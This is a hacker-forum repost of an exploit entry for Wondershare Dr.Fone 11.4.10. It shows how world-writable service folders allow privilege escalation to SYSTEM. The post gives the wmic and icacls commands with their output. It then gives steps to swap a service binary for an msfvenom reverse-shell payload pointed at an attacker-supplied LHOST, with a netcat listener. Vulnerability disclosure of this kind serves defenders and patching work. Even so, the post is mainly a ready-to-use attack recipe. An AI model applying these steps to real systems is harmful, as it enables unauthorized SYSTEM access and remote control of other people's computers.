Jump to content

  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Wondershare Dr.Fone 11.4.10 - Insecure File Permissions

 Share
HACK1949

By HACK1949,
in CHT Vulnerability database

Recommended Posts

HACK1949 Grand Master

HACK1949

Posted
Posted 
# Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
# Date: 04/25/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://drfone.wondershare.com/
# Software Link: https://download.wondershare.com/drfone_full3360.exe
# Version: 11.4.10
# Tested on: Windows 10 64-bit

 # Note: The application folder "Wondershare Dr.Fone" may be different (e.g it will be "drfone" if we download the installer from the italian website)

 # Description:
 The application "Wondershare Dr. Fone" comes with 3 services: 
 1. DFWSIDService
 2. ElevationService
 3. Wondershare InstallAssist

 All the folders that contain the binaries for the services have weak permissions.
 These weak permissions allow any authenticated user to get SYSTEM privileges.

 First, we need to check if services are running using the following command:
 wmic service get name,displayname,pathname,startmode,startname,state | findstr /I wondershare

 Wondershare WSID help                     DFWSIDService               C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe                          Auto 	LocalSystem	Running  
 Wondershare Driver Install Service help   ElevationService            C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps\ElevationService.exe	Auto 	LocalSystem     Running  
 Wondershare Install Assist Service        Wondershare InstallAssist	C:\ProgramData\Wondershare\Service\InstallAssistService.exe                                     Auto 	LocalSystem     Running  

 Now we need to check if we have enough privileges to replace the binaries:

 icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone"
 Everyone:(OI)(CI)(F) <= the first row tells us that Everyone has Full Access (F) on files (OI = Object Inherit) and folders (CI = Container Inherit)
 ...

 icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps"
 Everyone:(I)(OI)(CI)(F) <= same here
 ...

 icacls "C:\ProgramData\Wondershare\Service"
 Everyone:(I)(OI)(CI)(F) <= and here
 ...


# Proof of Concept:
1. Create an exe file with the name of the binary we want to replace  (e.g. WsidService.exe if we want to exploit the service "Wondershare WSID help") 
2. Put it in the folder (e.g. C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\)
3. After replacing the binary, wait the next reboot (unless the service can be restarted manually)

As a proof of concept we can generate a simple reverse shell using msfvenom, and use netcat as the listener:
simple payload: msfvenom --payload windows/shell_reverse_tcp LHOST=<YOUR_IP_ADDRESS> LPORT=<YOUR_PORT> -f exe > WsidService.exe
listener: nc -nlvp <YOUR_PORT>
Link to post
Link to comment
Share on other sites
 Share
Go to topic listing

discussion group

discussion group

  
    You don't have permission to chat.

    • Recently Browsing   0 members

      • No registered users viewing this page.

    黑客世界站内导航 (SITE MAP)

    ×
    ×
    • Create New...